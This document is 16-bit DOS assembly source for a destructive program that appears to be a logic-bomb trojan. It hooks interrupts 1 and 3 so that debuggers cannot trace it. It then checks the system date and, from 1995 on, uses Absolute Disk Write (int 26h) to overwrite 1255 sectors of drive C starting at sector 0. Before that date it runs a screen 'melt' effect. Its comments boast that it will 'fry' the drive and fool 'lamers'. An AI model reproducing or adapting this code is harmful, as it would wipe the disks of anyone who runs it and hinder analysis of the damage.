segreg  segment byte public 
        assume cs:segreg,ds:segreg,es:segreg,ss:segreg
        org     0100h
start:        
        jmp     realstart

write   db   "}udu}԰L h}*}}s3#}2¾'fg"
old_seg_1       dw      0000            ; old int 1 segment address
old_off_1       dw      0000            ; old int 1 offset address
old_seg_3       dw      0000            ; old int 3 segment address
old_off_3       dw      0000            ; old int 3 offset address

realstart:
        cli                             ; clear int flag, prevent ctrl-breaking
;***************************************************************************
get_ints:      
        push    es                      ; save register
        push    bx                      ; save register 
        mov     ax,3501h                ; service 35h, get int 1
        int     21h                     ; do int 21h/35h, get int 1
        mov     [old_seg_1],es          ; save segment address of int 1
        mov     [old_off_1],bx          ; save offset address of int 1
        mov     al,03h                  ; get int 3
        int     21h                     ; do int 21h/35h, get int 3
        mov     [old_seg_3],es          ; save segment address of int 3
        mov     [old_off_3],bx          ; save offset address of int 3
        pop     bx                      ; restore registers
        pop     es                      ; restore registers
;***************************************************************************
change_ints:   
        push    cs                      ; code segment and data segment
        pop     ds                      ;    are now the same
        mov     dx,offset kill ;eat_int ; interrupts 1 and 3 now at eat_int
                                        ;    or kill. Eat_int reboots, Kill
                                        ;    will start fring the drive.
                                        ;    this is to stop debuggers
        mov     ax,2501h                ; service 25h, replace int 1
        int     21h                     ; do int 21h/25h, replace int 1
        mov     al,3                    ; replace int 3
        int     21h                     ; do int 21h/25h, replace int 3
        jmp     done                    ; done
;***************************************************************************
;put something here to screw up debuggers, if they are running.
eat_int:
        push    ds
        push    es                      ; this routine will do a hard boot
        mov     ax,cs                   ;    if a debugger is being used
        mov     es,ax                   ;    to trace throught the program
        mov     ds,ax
        push    si
        push    di
        db      0eah,000h,000h,0ffh,0ffh
        pop     di
        pop     si
        pop     es
        pop     ds
        ret
;***************************************************************************
done:        
        mov     ax,2a00h                ; specify service 2Ah
        int     21h                     ; do interrupt 21h/2Ah, get date 
        cmp     cx,7cbh                 ; is the current year 1994?
        jge     kill                    ; if year is GREATER than or EQUAL to
                                        ;    1995 then start frying, else melt
;***************************************************************************
continue:                               ; melting procedure starts here
        MOV     AX,0B800H
        MOV     ES,AX                              
loc_1:
        MOV     CX,07D0h
        XOR     BX,BX                              
        MOV     SI,0000h                            
loc_2:
instes1         db      26h             ; TASM doesn't support the ES: command,                                         
        MOV     AH,[SI]                 ;    so I had to allocate the value 
        CMP     AH,20h                  ;    26h.  The Intel processor will                    
        JZ      loc_4                   ;    see the ES: instruction though.                    
        JL      loc_3                   ;    this command is also recognised                    
        DEC     AH                      ;    by DOS's Debug utility.
instes2         db      26h             ; ES:                                        
        MOV     [SI],AH                            
        INC     BX                                 
        JMP     loc_4                               
        NOP                                        
loc_3:
        INC     AH                                 
instes3         db      26h             ; ES:                                        
        MOV     [SI],AH                            
        INC     BX                                 
loc_4:
        INC     SI                                 
        INC     SI                                 
        LOOP    loc_2                               
        CMP     BX,+00                             
        JNZ     loc_1                               
        MOV     AH,0Fh                              
        INT     10h                                 
        XOR     AH,AH                              
        INT     10h                     ; melt procedure ends here                    
                                        
;***************************************************************************
restore:                                               
        push    ds                      ; save register
        push    dx                      ; save register
        mov     ax,2501h                ; service 25h, set int 1
        mov     cx,offset old_seg_1     ; restore segment address of int 1
        mov     ds,cx
        mov     dx,offset old_off_1     ; restore offset address of int 1
        int     21h                     ; do int 21h/25h, set int 1
        mov     al,03h                  ; set int 3
        mov     cx,offset old_seg_3     ; restore segment address of int 3
        mov     ds,cx
        mov     dx,offset old_off_3     ; restore offset address of int 3
        int     21h                     ; do int 21h/25h, set int 3
        pop     dx                      ; restore registers
        pop     ds                      ; restore registers
        jmp     exit                    ; goto exit
;***************************************************************************
kill:                                   ; fry procedure starts here
        push    cs                      ; cs and ds now the same, ds = the 
        pop     ds                      ;    segment of info to write
        push    dx
        mov     al,2                    ; al = drive number, 2 = drive 'C'
        mov     cx,1255                 ; cx = number of sectors to write
        xor     dx,dx                   ; dx = starting sector, dx = 0
        mov     bx,offset write         ; bx = offset of info to write
        jmp     int26                   ; jmp into the interrupt
crap    db      0b8h                    ; a garbage mov ax,26CDh, may fool lamers
int26:        
        int     26h                     ; do interrupt 26h, Absolute Disk Write
        add     sp,2
        pop     dx                      ; clean up the stack        
        ret
        jc      restore                 ; go back and restore int 1 and int 3
                                        ;    if there was an error
        jmp     kill                    ; infinate loop until the hard drive
                                        ;    blows up, or the machine is      
                                        ;    turned off
;***************************************************************************
Exit:                                   ; exit program here
        sti                             ; set int. flag
        mov     ax,4c00h                ; service 4Ch
        int     21h                     ; int 21h/4Ch terminate program
                ENDS
                END start

